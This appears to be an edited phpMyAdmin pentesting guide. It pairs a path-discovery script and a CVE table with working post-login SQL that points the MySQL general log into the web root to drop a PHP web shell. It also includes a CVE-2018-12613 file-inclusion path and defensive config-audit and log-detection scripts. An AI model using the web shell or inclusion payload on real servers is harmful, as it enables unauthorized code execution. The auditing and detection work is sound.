Phpmyadmin Hacktricks

phpMyAdmin Pentesting Guide

Step 1: Discovery

An attacker scans for common paths:
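The list of candidate paths the guide refers to is not reproduced in this copy. The probe below is an added example, not code from the original page: its path list and the login-page markers it looks for are assumptions drawn from default package layouts and the stock phpMyAdmin login form (the `pma_username` field, the `phpMyAdmin` and `pma_lang` cookies). The HTTP request is kept apart from the response classifier so the classifier can be exercised offline on constructed responses.

```python
"""Probe a host for phpMyAdmin under common install paths.

Added example, not part of the original guide. The candidate path list and
the response markers are assumptions drawn from default package layouts and
the stock login page; the HTTP call is kept apart from the classifier so the
classifier can be exercised offline on constructed responses.
"""
import sys
import urllib.error
import urllib.request

# Assumption: mount points used by common packages and hand installs.
CANDIDATE_PATHS = [
    "/phpmyadmin/", "/phpMyAdmin/", "/pma/", "/PMA/", "/myadmin/",
    "/mysql/", "/dbadmin/", "/admin/phpmyadmin/", "/phpmyadmin2/",
]

# Assumption: strings present on a stock phpMyAdmin login page / its cookies.
BODY_MARKERS = ("<title>phpMyAdmin", "pma_username", "pma_navigation")
COOKIE_MARKERS = ("phpMyAdmin=", "pma_lang=")


def candidate_urls(base):
    """Join the base URL with each candidate path (no duplicate slashes)."""
    return [base.rstrip("/") + p for p in CANDIDATE_PATHS]


def classify(status, headers, body):
    """Map one response to 'open', 'restricted' or 'absent'.

    headers may be a dict or an http.client.HTTPMessage; both expose
    .items(), and the latter yields repeated Set-Cookie headers separately.
    """
    if status in (401, 403):
        # Something answers at that path but access is gated, e.g. the
        # Debian default of allowing phpMyAdmin only from localhost.
        return "restricted"
    if status != 200:
        return "absent"
    cookies = " ".join(v for k, v in headers.items() if k.lower() == "set-cookie")
    if any(m in cookies for m in COOKIE_MARKERS):
        return "open"
    if any(m in body for m in BODY_MARKERS):
        return "open"
    return "absent"


def probe(base, timeout=5.0):
    """Request each candidate URL; return {url: verdict} for non-absent ones."""
    hits = {}
    for url in candidate_urls(base):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                status, headers = resp.status, resp.headers
                body = resp.read(65536).decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            status, headers, body = err.code, err.headers, ""
        except (urllib.error.URLError, OSError):
            continue  # refused / timed out: nothing to classify
        verdict = classify(status, headers, body)
        if verdict != "absent":
            hits[url] = verdict
    return hits


if __name__ == "__main__":
    for url, verdict in probe(sys.argv[1]).items():
        print(f"{verdict:10} {url}")
```

A `restricted` verdict only says that the path is gated, not that phpMyAdmin is behind it; a server that answers 403 for every unknown path will produce false positives, so confirm with a known-absent path first.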


4. Historical CVEs (mostly post-authentication)

| CVE | Impact | Fixed in |
|-----|--------|----------|
| CVE-2016-5734 | Authenticated RCE: preg_replace() with the /e modifier in table search (only when running on PHP 5.4.6 or earlier) | 4.6.3 (also 4.0.10.16, 4.4.15.7) |
| CVE-2018-12613 | Authenticated local file inclusion via index.php?target=db_sql.php%253f/../../ (the ? must be double-URL-encoded) | 4.8.2 |
| CVE-2019-12922 | CSRF on the setup page that lets an attacker delete a configured server (no RCE) | 4.9.1 |

Check for $cfg['AllowArbitraryServer'] = true; in config.inc.php. With it on, the login form accepts an arbitrary MySQL host, so anyone who can reach phpMyAdmin can use it as a client to internal database servers they could not otherwise reach (a pivot), or log in against a MySQL server they control to obtain an authenticated session. The fix is $cfg['AllowArbitraryServer'] = false; or, where the feature is genuinely needed, a tight $cfg['ArbitraryServerRegexp'] limiting which hosts may be named.
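A defender-side check for this and the other config.inc.php settings that widen the attack surface. This is an added example, not code from the original guide: it is a line-oriented regex scan rather than a PHP parser (settings assembled at runtime or split across lines are missed, and when several servers share the $i index the last assignment wins), and both sample configs are constructed for demonstration.

```python
"""Audit a phpMyAdmin config.inc.php for settings that widen the attack surface.

Added example, not from the original guide. Line-oriented regex scan, not a
PHP parser; the sample configs below are constructed for demonstration.
"""
import re
import sys

# Constructed weak config: auto-login as root, empty password allowed,
# arbitrary MySQL host accepted at the login form.
WEAK_CONFIG = r"""<?php
$cfg['blowfish_secret'] = 'change-me-to-32-random-bytes';
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['AllowArbitraryServer'] = TRUE;
"""

# The same deployment with the settings corrected.
HARDENED_CONFIG = r"""<?php
$cfg['blowfish_secret'] = 'change-me-to-32-random-bytes';
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['AllowArbitraryServer'] = false;
"""

# One  $cfg[...][...] = value;  assignment per line.
ASSIGN_RE = re.compile(r"^\s*\$cfg(?P<key>(?:\[[^\]]+\])+)\s*=\s*(?P<val>[^;]+);", re.M)


def parse_cfg(text):
    """Return {normalised key: raw value}; "[$i]" becomes "[*]", quotes dropped."""
    cfg = {}
    for m in ASSIGN_RE.finditer(text):
        key = m.group("key").replace("[$i]", "[*]").replace("'", "").replace('"', "")
        cfg[key] = m.group("val").strip()
    return cfg


def php_true(val):
    return val.strip().lower() in ("true", "1")


def php_str(val):
    return val.strip().strip("'\"")


def audit(text):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    cfg = parse_cfg(text)
    findings = []
    if php_true(cfg.get("[AllowArbitraryServer]", "false")):
        if "[ArbitraryServerRegexp]" in cfg:
            findings.append("AllowArbitraryServer on: verify ArbitraryServerRegexp "
                            "only matches the intended hosts")
        else:
            findings.append("AllowArbitraryServer on with no ArbitraryServerRegexp: "
                            "the login form accepts any MySQL host (internal pivot)")
    if php_str(cfg.get("[Servers][*][auth_type]", "")) == "config":
        findings.append("auth_type 'config': credentials live in config.inc.php and "
                        "anyone who reaches the URL is logged in without a prompt")
    if php_true(cfg.get("[Servers][*][AllowNoPassword]", "false")):
        findings.append("AllowNoPassword on: accounts with an empty password can log in")
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONFIG
    for finding in audit(text):
        print("-", finding)
```

Run it against a real file with `python3 audit_pma.py /etc/phpmyadmin/config.inc.php`; with no argument it audits the constructed weak sample.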

Part 3: Remote Code Execution (RCE) After Login

Once inside, the game is over if you achieve RCE. Everything below assumes the MySQL account phpMyAdmin logged in with can change global server variables (SUPER, or SYSTEM_VARIABLES_ADMIN on MySQL 8.0); an unprivileged account cannot do any of this.

3.2 General Log File Injection (No INTO OUTFILE needed)

If secure_file_priv blocks INTO OUTFILE, use the general query log instead. secure_file_priv restricts LOAD DATA and SELECT ... INTO OUTFILE, but not where mysqld writes its own log files, so a privileged account can point the general log at the web root and get the server to write a PHP file for it:

```sql
-- Requires SUPER (or SYSTEM_VARIABLES_ADMIN on 8.0) and log_output
-- containing FILE (the default); the mysqld OS user must be able to
-- create files under /var/www/html.
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
-- Every statement is now appended to shell.php verbatim, this one included.
-- PHP ignores the log text outside the <?php ... ?> tags.
SELECT "<?php system($_GET['cmd']); ?>";
-- Stop logging so the file stops growing, then trigger it:
--   http://target/shell.php?cmd=id
SET GLOBAL general_log = 'OFF';
```

Note: this only works when MySQL and the web server share a filesystem (same host or container), the mysqld OS user can create files in the web root, the web server user can read them, and no MAC policy confines mysqld (the stock AppArmor profile on Ubuntu, for instance, restricts where it may write). If MySQL runs on a separate host, the log lands on the database server, not the web server.
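For the defender, the technique leaves two traces: the SET GLOBAL statement in the log file that was active when it was issued, and the PHP payload in the new one. The detector below is an added example, not code from the original guide; it scans general-log lines in the file layout (log_output=FILE) and a SHOW GLOBAL VARIABLES snapshot. The rule set and the web-root prefixes are assumptions to adapt per host, and the sample log is constructed, not captured.

```python
"""Detect abuse of the MySQL general query log as a PHP dropper.

Added example, not from the original guide. Scans general-log lines in the
file layout and a SHOW GLOBAL VARIABLES snapshot; the rules, web-root
prefixes and sample log below are assumptions / constructed data.
"""
import re

# Assumption: document roots the web server executes PHP from on this host.
WEB_ROOTS = ("/var/www/", "/srv/http/", "/usr/share/nginx/html/")

# Constructed sample in the general-log file layout:
#   <timestamp>\t<padded connection id> <command>\t<argument>
SAMPLE_LOG = (
    "2024-05-01T10:00:00.000000Z\t   12 Connect\tpma@localhost on  using TCP/IP\n"
    "2024-05-01T10:00:01.000000Z\t   12 Query\tSELECT * FROM users LIMIT 10\n"
    "2024-05-01T10:00:02.000000Z\t   12 Query\tSET GLOBAL general_log_file = '/var/www/html/shell.php'\n"
    "2024-05-01T10:00:03.000000Z\t   12 Query\tSELECT \"<?php system($_GET['cmd']); ?>\"\n"
    "2024-05-01T10:00:04.000000Z\t   13 Query\tSELECT name INTO OUTFILE '/tmp/export.csv' FROM t\n"
    "2024-05-01T10:00:05.000000Z\t   12 Quit\t\n"
)

LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# (rule name, pattern). When a pattern has a 'path' group, the rule only
# fires if that path is under a web root, which keeps exports to /tmp quiet.
RULES = [
    ("log file redirected into a web root",
     re.compile(r"SET\s+(?:GLOBAL\s+|PERSIST\s+)?(?:general_log_file|slow_query_log_file)"
                r"\s*=\s*'(?P<path>[^']*)'", re.I)),
    ("PHP open tag inside a statement", re.compile(r"<\?(?:php\b|=)", re.I)),
    ("INTO OUTFILE/DUMPFILE into a web root",
     re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'(?P<path>[^']*)'", re.I)),
]


def under_web_root(path):
    return any(path.startswith(root) for root in WEB_ROOTS)


def scan_line(line):
    """Return an alert dict for one general-log line, or None."""
    m = LINE_RE.match(line)
    if not m or m.group("cmd") != "Query":
        return None
    arg = m.group("arg")
    for rule, rx in RULES:
        hit = rx.search(arg)
        if not hit:
            continue
        path = hit.groupdict().get("path")
        if path is not None and not under_web_root(path):
            continue
        return {"ts": m.group("ts"), "conn": int(m.group("conn")), "rule": rule, "query": arg}
    return None


def scan(text):
    """Scan a whole log; lines are independent, so this is a plain map."""
    return [a for a in (scan_line(line) for line in text.splitlines()) if a]


def check_variables(variables):
    """Findings from a {name: value} snapshot of SHOW GLOBAL VARIABLES."""
    findings = []
    if (variables.get("general_log", "OFF").upper() == "ON"
            and under_web_root(variables.get("general_log_file", ""))):
        findings.append("general_log is ON and general_log_file points into a web root")
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE may write anywhere mysqld can")
    return findings


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['ts']} conn={alert['conn']} {alert['rule']}: {alert['query']}")
```

Because a SET GLOBAL general_log_file issued while logging is off is never written anywhere, pair the log scan with the variable snapshot (and, where available, an audit plugin), and treat general_log_file or slow_query_log_file pointing outside the MySQL log directory as a finding regardless of content.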